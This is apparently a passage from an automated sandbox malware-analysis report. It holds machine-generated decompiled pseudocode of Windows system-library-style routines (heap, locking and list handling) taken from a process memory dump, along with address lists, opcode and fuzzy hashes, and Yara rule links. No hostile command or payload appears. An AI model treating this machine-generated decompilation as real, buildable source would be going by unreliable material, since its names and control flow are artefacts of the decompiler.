				_t64 =  *0x31b5768; // 0x77f05768
				if(_t64 != 0x31b5768) {
					while(1) {
						_t8 = _t64 + 8; // 0x77f05770
						_t42 = _t8;
						_t53 = _t64;
						 *_t42 =  *_t42 + 1;
						_v16 = _t42;
						E030DFFB0(_t53, _t64, 0x31b8a6c);
						 *0x31bb1e0(_v24, _t67);
						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
							_v37 = 1;
						}
						E030E2280(_t45, 0x31b8a6c);
						_t47 = _v28;
						_t64 =  *_t64;
						 *_t47 =  *_t47 - 1;
						if( *_t47 != 0) {
							goto L8;
						}
						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
							L10:
							_push(3);
							asm("int 0x29");
						} else {
							_t48 =  *((intOrPtr*)(_t53 + 4));
							if( *_t48 != _t53) {
								goto L10;
							} else {
								 *_t48 = _t64;
								_t61 =  &_v36;
								 *((intOrPtr*)(_t64 + 4)) = _t48;
								_t49 = _v32;
								if( *_t49 != _t61) {
									goto L10;
								} else {
									 *_t53 = _t61;
									 *((intOrPtr*)(_t53 + 4)) = _t49;
									 *_t49 = _t53;
									_v32 = _t53;
									goto L8;
								}
							}
						}
						L11:
						_t51 = _v29;
						goto L12;
						L8:
						if(_t64 != 0x31b5768) {
							_t67 = _v20;
							continue;
						}
						goto L11;
					}
				}
				L12:
				E030DFFB0(_t51, _t64, 0x31b8a6c);
				while(1) {
					_t37 = _v28;
					_t55 =  &_v28;
					if(_t37 == _t55) {
						break;
					}
					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
						goto L10;
					} else {
						_t59 =  *_t37;
						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
							goto L10;
						} else {
							_t62 =  &_v28;
							_v28 = _t59;
							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
							L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
							continue;
						}
					}
					L18:
				}
				_pop(_t65);
				_pop(_t68);
				_pop(_t52);
				return E0310B640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
				goto L18;
			}

































                                                                                                                                                    0x03173d40
                                                                                                                                                    0x03173d48
                                                                                                                                                    0x03173d52
                                                                                                                                                    0x03173d59
                                                                                                                                                    0x03173d5d
                                                                                                                                                    0x03173d61
                                                                                                                                                    0x03173d63
                                                                                                                                                    0x03173d67
                                                                                                                                                    0x03173d69
                                                                                                                                                    0x03173d72
                                                                                                                                                    0x03173d76
                                                                                                                                                    0x03173d7a
                                                                                                                                                    0x03173d7f
                                                                                                                                                    0x03173d8b
                                                                                                                                                    0x03173d91
                                                                                                                                                    0x03173d91
                                                                                                                                                    0x03173d91
                                                                                                                                                    0x03173d94
                                                                                                                                                    0x03173d96
                                                                                                                                                    0x03173d9d
                                                                                                                                                    0x03173da1
                                                                                                                                                    0x03173db0
                                                                                                                                                    0x03173dba
                                                                                                                                                    0x03173dbc
                                                                                                                                                    0x03173dbc
                                                                                                                                                    0x03173dc6
                                                                                                                                                    0x03173dcb
                                                                                                                                                    0x03173dcf
                                                                                                                                                    0x03173dd1
                                                                                                                                                    0x03173dd4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03173dd9
                                                                                                                                                    0x03173e0c
                                                                                                                                                    0x03173e0c
                                                                                                                                                    0x03173e0f
                                                                                                                                                    0x03173ddb
                                                                                                                                                    0x03173ddb
                                                                                                                                                    0x03173de0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03173de2
                                                                                                                                                    0x03173de2
                                                                                                                                                    0x03173de4
                                                                                                                                                    0x03173de8
                                                                                                                                                    0x03173deb
                                                                                                                                                    0x03173df1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03173df3
                                                                                                                                                    0x03173df3
                                                                                                                                                    0x03173df5
                                                                                                                                                    0x03173df8
                                                                                                                                                    0x03173dfa
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03173dfa
                                                                                                                                                    0x03173df1
                                                                                                                                                    0x03173de0
                                                                                                                                                    0x03173e11
                                                                                                                                                    0x03173e11
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03173dfe
                                                                                                                                                    0x03173e04
                                                                                                                                                    0x03173e06
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03173e06
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03173e04
                                                                                                                                                    0x03173d91
                                                                                                                                                    0x03173e15
                                                                                                                                                    0x03173e1a
                                                                                                                                                    0x03173e1f
                                                                                                                                                    0x03173e1f
                                                                                                                                                    0x03173e23
                                                                                                                                                    0x03173e29
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03173e2e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03173e30
                                                                                                                                                    0x03173e30
                                                                                                                                                    0x03173e35
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03173e37
                                                                                                                                                    0x03173e3e
                                                                                                                                                    0x03173e42
                                                                                                                                                    0x03173e48
                                                                                                                                                    0x03173e4e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03173e4e
                                                                                                                                                    0x03173e35
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03173e2e
                                                                                                                                                    0x03173e5b
                                                                                                                                                    0x03173e5c
                                                                                                                                                    0x03173e5d
                                                                                                                                                    0x03173e68
                                                                                                                                                    0x00000000

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1f46e8b7be823bd335145874937fee643beb8c27b4c5416106da6a480e42be03
                                                                                                                                                    • Instruction ID: 9f82407000ab1b960da47bc15d9053ef2f64525b25e639d7a1b6d0c0697e0cb1
                                                                                                                                                    • Opcode Fuzzy Hash: 1f46e8b7be823bd335145874937fee643beb8c27b4c5416106da6a480e42be03
                                                                                                                                                    • Instruction Fuzzy Hash: 94317A75609302DFC714DF24D58049ABBF5FF89604F4889AEF4A89B251D730D954CBE2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030FA70E, Relevance: .1, Instructions: 96COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                    			E030FA70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x31b7b10; // 0x8
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x31b7b10 = 8;
					 *0x31b7b14 = 0x31b7b0c;
					 *0x31b7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x9
					E030FA990(0x31b7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L030FA840(__edx, __ecx, __ecx, _t52, 0x31b7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x31b7b10; // 0x8
					_t3 = _t37 + 0x27; // 0x2f
					__eflags = _t3 >> 5 -  *0x31b7b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x31b7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x2f
						_v8 = _t4 >> 5;
						_t50 = L030E4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x31b7b18 = _v8;
						_t8 = _t52 + 7; // 0xf
						E0310F3E0(_t50,  *0x31b7b14, _t8 >> 3);
						_t28 =  *0x31b7b14; // 0x77f07b0c
						__eflags = _t28 - 0x31b7b0c;
						if(_t28 != 0x31b7b0c) {
							L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x10
						 *0x31b7b14 = _t50;
						_t48 = _v12;
						 *0x31b7b10 = _t9;
						goto L6;
					}
					 *0x31b7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                                                                                                                                    0x030fa713
                                                                                                                                                    0x030fa714
                                                                                                                                                    0x030fa717
                                                                                                                                                    0x030fa71d
                                                                                                                                                    0x030fa720
                                                                                                                                                    0x030fa722
                                                                                                                                                    0x030fa727
                                                                                                                                                    0x030fa74a
                                                                                                                                                    0x030fa754
                                                                                                                                                    0x030fa75e
                                                                                                                                                    0x030fa768
                                                                                                                                                    0x030fa76a
                                                                                                                                                    0x030fa773
                                                                                                                                                    0x030fa78b
                                                                                                                                                    0x030fa790
                                                                                                                                                    0x030fa792
                                                                                                                                                    0x030fa741
                                                                                                                                                    0x030fa741
                                                                                                                                                    0x030fa743
                                                                                                                                                    0x030fa749
                                                                                                                                                    0x030fa749
                                                                                                                                                    0x030fa732
                                                                                                                                                    0x030fa73a
                                                                                                                                                    0x030fa797
                                                                                                                                                    0x030fa79d
                                                                                                                                                    0x030fa7a3
                                                                                                                                                    0x030fa7a9
                                                                                                                                                    0x030fa7b6
                                                                                                                                                    0x030fa7bc
                                                                                                                                                    0x030fa7ca
                                                                                                                                                    0x030fa7e0
                                                                                                                                                    0x030fa7e2
                                                                                                                                                    0x030fa7e4
                                                                                                                                                    0x03139bf2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03139bf2
                                                                                                                                                    0x030fa7ed
                                                                                                                                                    0x030fa7f2
                                                                                                                                                    0x030fa800
                                                                                                                                                    0x030fa805
                                                                                                                                                    0x030fa80d
                                                                                                                                                    0x030fa812
                                                                                                                                                    0x03139c08
                                                                                                                                                    0x03139c08
                                                                                                                                                    0x030fa818
                                                                                                                                                    0x030fa81b
                                                                                                                                                    0x030fa821
                                                                                                                                                    0x030fa824
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030fa824
                                                                                                                                                    0x030fa7ae
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030fa7ae
                                                                                                                                                    0x030fa73c
                                                                                                                                                    0x030fa73e
                                                                                                                                                    0x00000000

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 84256c03b98c4d215c4c2d16d63a3b0b501cc097dfd399cf927ce8db5e5af741
                                                                                                                                                    • Instruction ID: 5e96aa1a83e28fdfc18385de62b0b79ef362d65bb9252d085d3d3498109b3bc4
                                                                                                                                                    • Opcode Fuzzy Hash: 84256c03b98c4d215c4c2d16d63a3b0b501cc097dfd399cf927ce8db5e5af741
                                                                                                                                                    • Instruction Fuzzy Hash: A631C2B17212009FC719DB19EE81F5AB7F9EFCC710F14095AE10997A84E3B0A941CFA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030CAA16, Relevance: .1, Instructions: 93COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                    			E030CAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x31bd360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x31b7b9c; // 0x0
					_t53 = L030E4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0310B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0310F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L030D6C59(_t53, _t51, _t58) != 0) {
							_t28 = E030F5E50(0x30ac338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E030FB230(_v32, _v28, 0x30ac2d8, 1,  &_v24);
								_t28 = E030CF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                                                                                                                                    0x030caa25
                                                                                                                                                    0x030caa29
                                                                                                                                                    0x030caa2d
                                                                                                                                                    0x030caa30
                                                                                                                                                    0x030caa37
                                                                                                                                                    0x030caa3c
                                                                                                                                                    0x03124458
                                                                                                                                                    0x03124458
                                                                                                                                                    0x03124472
                                                                                                                                                    0x03124474
                                                                                                                                                    0x03124476
                                                                                                                                                    0x030caa64
                                                                                                                                                    0x030caa74
                                                                                                                                                    0x0312447c
                                                                                                                                                    0x03124483
                                                                                                                                                    0x03124492
                                                                                                                                                    0x030caa52
                                                                                                                                                    0x030caa54
                                                                                                                                                    0x030caa5e
                                                                                                                                                    0x031244a8
                                                                                                                                                    0x031244ad
                                                                                                                                                    0x031244af
                                                                                                                                                    0x031244b6
                                                                                                                                                    0x031244b6
                                                                                                                                                    0x031244b9
                                                                                                                                                    0x031244bc
                                                                                                                                                    0x031244cd
                                                                                                                                                    0x031244d3
                                                                                                                                                    0x031244d6
                                                                                                                                                    0x031244e1
                                                                                                                                                    0x031244e1
                                                                                                                                                    0x031244e6
                                                                                                                                                    0x031244e8
                                                                                                                                                    0x031244fb
                                                                                                                                                    0x031244fb
                                                                                                                                                    0x031244e8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030caa5e
                                                                                                                                                    0x03124476
                                                                                                                                                    0x030caa42
                                                                                                                                                    0x030caa46
                                                                                                                                                    0x030caa48
                                                                                                                                                    0x030caa4c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a681b6b7871deeb5f008b41f666a3fe621426d6052381fb9d9721adf66b34a4a
                                                                                                                                                    • Instruction ID: 126eeb97039453cd6651b1ac4c59e881131f0b7ce5abf08e16fb0f2fb9efbb05
                                                                                                                                                    • Opcode Fuzzy Hash: a681b6b7871deeb5f008b41f666a3fe621426d6052381fb9d9721adf66b34a4a
                                                                                                                                                    • Instruction Fuzzy Hash: 1431F571A01269AFCF14EF65CD81ABFB7B9EF48700F054469F901EB150EB749911DBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030F61A0, Relevance: .1, Instructions: 93COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 97%
                                                                                                                                                    			E030F61A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E030F5E50(0x30a67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E03199D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E030CF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                                                                                                                                    0x030f61b3
                                                                                                                                                    0x030f61b5
                                                                                                                                                    0x030f61bd
                                                                                                                                                    0x030f61c3
                                                                                                                                                    0x030f61c7
                                                                                                                                                    0x030f61d2
                                                                                                                                                    0x030f61ff
                                                                                                                                                    0x030f61ff
                                                                                                                                                    0x030f6201
                                                                                                                                                    0x030f6207
                                                                                                                                                    0x030f6207
                                                                                                                                                    0x030f61d4
                                                                                                                                                    0x030f61d9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f61df
                                                                                                                                                    0x030f61e2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f61e6
                                                                                                                                                    0x030f61e8
                                                                                                                                                    0x030f61ee
                                                                                                                                                    0x030f61ee
                                                                                                                                                    0x030f61f9
                                                                                                                                                    0x0313762f
                                                                                                                                                    0x03137632
                                                                                                                                                    0x03137635
                                                                                                                                                    0x03137639
                                                                                                                                                    0x03137640
                                                                                                                                                    0x0313766e
                                                                                                                                                    0x03137675
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03137681
                                                                                                                                                    0x03137689
                                                                                                                                                    0x0313768d
                                                                                                                                                    0x03137691
                                                                                                                                                    0x03137695
                                                                                                                                                    0x03137699
                                                                                                                                                    0x031376af
                                                                                                                                                    0x031376b5
                                                                                                                                                    0x031376b7
                                                                                                                                                    0x031376b7
                                                                                                                                                    0x031376d7
                                                                                                                                                    0x031376dc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031376dc
                                                                                                                                                    0x031376a2
                                                                                                                                                    0x031376a9
                                                                                                                                                    0x03137651
                                                                                                                                                    0x03137653
                                                                                                                                                    0x03137653
                                                                                                                                                    0x03137656
                                                                                                                                                    0x03137656
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03137656
                                                                                                                                                    0x03137644
                                                                                                                                                    0x03137646
                                                                                                                                                    0x03137648
                                                                                                                                                    0x03137648
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a612284c83eb09c6c849cee2e61b851ebcd1abd7e18c8219611f31b8c78e6cae
                                                                                                                                                    • Instruction ID: c11e64178b61f07ce84f675e02b9ecf7c39b049826a1ad3b8e101c57de3d5825
                                                                                                                                                    • Opcode Fuzzy Hash: a612284c83eb09c6c849cee2e61b851ebcd1abd7e18c8219611f31b8c78e6cae
                                                                                                                                                    • Instruction Fuzzy Hash: 50318CB16067018FE360DF1DC850B2AF7E5FB88B10F09496DE9989B791E7B1E844CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03104A2C, Relevance: .1, Instructions: 92COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E03104A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x31bd360 ^ _t62;
				_v8 =  *0x31bd360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E030E2280(_t26, 0x31b8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E030DFFB0(_t41, _t51, 0x31b8608);
						L2:
						 *0x31bb1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0310B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E030E2280(_t28, 0x31b8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E030DFFB0(_t42, _t53, 0x31b8608);
							if(_t53 != 0) {
								L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E030DFFB0(_t41, _t51, 0x31b8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                                                                                                                                    0x03104a2c
                                                                                                                                                    0x03104a34
                                                                                                                                                    0x03104a3c
                                                                                                                                                    0x03104a3e
                                                                                                                                                    0x03104a48
                                                                                                                                                    0x03104a4b
                                                                                                                                                    0x03104a4d
                                                                                                                                                    0x03104a51
                                                                                                                                                    0x03104a9c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03104aa3
                                                                                                                                                    0x03104aa8
                                                                                                                                                    0x03104aad
                                                                                                                                                    0x03104ab1
                                                                                                                                                    0x03104ade
                                                                                                                                                    0x03104ae3
                                                                                                                                                    0x03104a5a
                                                                                                                                                    0x03104a62
                                                                                                                                                    0x03104a6a
                                                                                                                                                    0x03104a6e
                                                                                                                                                    0x0313f203
                                                                                                                                                    0x03104a84
                                                                                                                                                    0x03104a88
                                                                                                                                                    0x03104a89
                                                                                                                                                    0x03104a8a
                                                                                                                                                    0x03104a95
                                                                                                                                                    0x03104a95
                                                                                                                                                    0x03104a79
                                                                                                                                                    0x03104a80
                                                                                                                                                    0x03104af2
                                                                                                                                                    0x03104af4
                                                                                                                                                    0x03104af9
                                                                                                                                                    0x03104aff
                                                                                                                                                    0x03104b01
                                                                                                                                                    0x03104b03
                                                                                                                                                    0x03104b08
                                                                                                                                                    0x0313f20a
                                                                                                                                                    0x0313f212
                                                                                                                                                    0x0313f216
                                                                                                                                                    0x0313f216
                                                                                                                                                    0x03104b08
                                                                                                                                                    0x03104b13
                                                                                                                                                    0x03104b1a
                                                                                                                                                    0x0313f229
                                                                                                                                                    0x0313f229
                                                                                                                                                    0x03104b1a
                                                                                                                                                    0x03104a82
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03104a82
                                                                                                                                                    0x03104ab7
                                                                                                                                                    0x03104acd
                                                                                                                                                    0x03104acd
                                                                                                                                                    0x03104ad5
                                                                                                                                                    0x03104ada
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03104ada
                                                                                                                                                    0x03104ac2
                                                                                                                                                    0x03104acb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03104acb
                                                                                                                                                    0x03104a53
                                                                                                                                                    0x03104a53
                                                                                                                                                    0x03104a58
                                                                                                                                                    0x00000000

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8481cc0425bab7ace748725ff415d5c1c22e2f33d9c6fe1eea39080207c56d98
                                                                                                                                                    • Instruction ID: 287d94e3740cf29d5a74481e1015c81593a4903ac9d6d8666daa4d3efa53525e
                                                                                                                                                    • Opcode Fuzzy Hash: 8481cc0425bab7ace748725ff415d5c1c22e2f33d9c6fe1eea39080207c56d98
                                                                                                                                                    • Instruction Fuzzy Hash: F0310D36206345DFC725EE15C981B6ABBA8FFCDB00F095469EA631B280CBB0D841CF85
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03108EC7, Relevance: .1, Instructions: 92COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                    			E03108EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x31bd360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E030F4E70(0x31b86e4, 0x3109490, 0, 0);
